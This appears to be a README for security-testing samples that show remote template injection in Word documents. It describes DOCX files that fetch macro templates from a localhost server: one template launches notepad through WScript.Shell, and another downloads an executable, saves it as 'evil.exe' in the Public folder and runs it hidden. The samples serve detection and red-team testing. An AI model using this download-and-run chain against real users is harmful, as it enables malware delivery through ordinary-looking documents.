### Example of Remote Template injection leading to notepad execution

- `1-docx-execute-notepad-wscript.shell.docx`
    - empty DOCX with remote template set to: `http://localhost:8080/1-execute-notepad-wscript.shell.dotm`

- `1-execute-notepad-wscript.shell.dotm`
    - will be fetched by `1-docx-execute-notepad-wscript.shell.docx`.
    - spawns `notepad`  with `WScript.Shell`

- `1-docx-filedropper-url-wscript.shell.docx`
    - empty DOCX with remote template set to: `http://localhost:8080/1-filedropper-url-wscript.shell.abcde`

- `1-filedropper-url-wscript.shell.abcde`
    - will be fetched by `1-docx-filedropper-url-wscript.shell.docx`.
    - downloads `http://localhost:8080/Autoruns64.exe` -> saves them to `%SystemDrive%\Users\Public\evil.exe` -> runs `evil.exe` as **hidden** process with `WScript.Shell`

Be sure to launch `start-webserver.bat` before testing these samples.